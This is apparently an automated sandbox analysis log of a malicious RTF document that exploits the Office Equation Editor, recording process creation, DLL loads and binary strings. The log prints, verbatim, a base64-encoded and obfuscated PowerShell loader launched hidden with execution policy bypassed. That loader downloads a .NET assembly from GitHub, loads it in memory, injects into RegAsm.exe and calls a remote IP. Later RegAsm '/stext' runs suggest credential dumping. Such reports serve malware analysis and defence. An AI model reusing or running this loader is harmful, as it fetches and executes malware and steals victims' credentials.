              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rvipsuupwrzfhg"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cpnhtnerszrskmtpxa"Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: MKWbWHd5Ni.LNK.0.drLNK file: ..\..\..\..\..\Desktop\MKWbWHd5Ni.rtf
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.380562740.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380118377.00000000002A9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
